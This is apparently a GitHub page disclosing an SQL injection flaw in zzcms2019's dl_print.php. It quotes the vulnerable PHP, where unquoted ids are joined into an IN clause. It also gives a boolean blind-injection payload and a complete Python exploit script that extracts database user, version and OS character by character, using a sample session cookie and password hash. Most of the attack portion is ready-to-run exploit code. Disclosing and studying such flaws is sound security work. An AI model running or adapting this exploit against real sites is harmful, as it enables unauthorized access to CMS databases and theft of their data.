Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

zzcms2019 SQL injection vulnerability in dl_print.php

Local testing requires the user group to have the right to download proxy information (for convenience, open directly in the background, simulate real vip users)

The vulnerability is located at line 78 of /dl/dl_print.php and is used to output information. Some of the key code is shown below

if(!empty($_POST['id'])){
    for($i=0; $i<count($_POST['id']);$i++){
    $id=$id.($_POST['id'][$i].',');
    }
	
}else{
	$founderr=1;
	$ErrMsg="<li>操作失败!请先选中要下载的信息</li>";
}
$id=substr($id,0,strlen($id)-1);//去除最后面的","

. . .   . . .

if (strpos($id,",")>0){
	$sql="select * from zzcms_dl where passed=1 and id in (". $id .") ";
	}else{
	$sql="select * from zzcms_dl where passed=1  and id=".$id." order by id desc";
}

Since and id in (".$id.") does not use single quotes, the global GPC filter of ZZCMS does not work here and constructs Boolean conditions directly for blind injection.

The first step is to register a company type account at the front desk and then send the agent for later injection

Secondly, the user group of the current user has the right to print the agent information (local test, just give the permission in the background, simulate the operation of VIP users in the real environment).

payload:

id[0]=0,(if(((ascii(substr((select @@version),1,1)))=53),1,0)))#

Here is exp:

#coding: utf-8
import requests
import string

url = 'http://{}/dl/dl_print.php'

#header 头,自己根据实际环境做修改
headers = {
'Host':'{}',
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded',
'Content-Length':'23',
'Connection':'keep-alive',
'Cookie':'{}',
'Upgrade-Insecure-Requests':'1'
}

def Sqli(host,sql):
	global url
	url = url.format(host)
	sqli = "ascii(substr(({}),{},1)))={}"
	sqli_2 = "0,(if((({}),1,0)))#"
	res_data = ""
	s = requests.session()
	i = 1
	while 1:
		tmp_data = res_data
		for c in string.printable:
			post_sqli_data = sqli_2.format(sqli.format(sql,str(i),ord(c)))
			data = {'id[0]':post_sqli_data}
			res = s.post(url,data=data, headers=headers)
			if '13333333333' in res.text: #自己根据实际环境做修改
				res_data += c
				print (res_data)
				break
		i += 1
		if tmp_data == res_data:
			print ('完成')
			return 

if __name__ == "__main__":
	#设置 host 地址
	host = "127.0.0.1:9000"
	#设置用户 cookie
	user_cookie = "PHPSESSID=dh6bhd10g47tjc4jlhqf2leqnn; UserName=admin2; PassWord=343b1c4a3ea721b2d640fc8700db0f36"
	sql = "select group_concat(user(),version(),@@version_compile_os)"
	headers['Host'] = headers['Host'].format(host)
	headers['Cookie'] = headers['Cookie'].format(user_cookie)
	Sqli(host,sql)

Injection results